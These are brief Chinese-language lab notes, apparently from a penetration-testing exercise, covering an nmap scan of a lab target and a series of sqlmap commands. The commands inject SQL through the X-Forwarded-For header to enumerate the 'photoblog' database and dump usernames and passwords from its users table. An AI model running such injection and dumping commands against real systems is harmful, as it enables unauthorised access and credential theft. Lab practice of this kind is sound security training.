靶机192.168.1.103
攻击机192.168.1.108
nmap -sV 192.168.1.103
80/tcp open http nginx 0.7.67
avws漏洞扫描器
漏洞利用
利用sqlmap
sqlmap -u url --headers="X-Forwarded-For:*" --dbs --batch
sqlmap -u http://192.168.1.103 --headers="X-Forwarded-For:*" -D photoblog --tables --batch
sqlmap -u http://192.168.1.103 --headers="X-Forwarded-For:*" -D photoblog -T users --columns --batch
sqlmap -u http://192.168.1.103 --headers="X-Forwarded-For:*" -D photoblog -T users -C login,password --dump --batch